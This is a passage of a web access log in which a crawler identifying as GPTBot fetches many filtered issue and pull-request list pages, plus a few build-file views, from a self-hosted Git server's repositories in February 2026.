"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13208] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:19:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15660] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11223] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:19:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11222] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:19:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:19:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 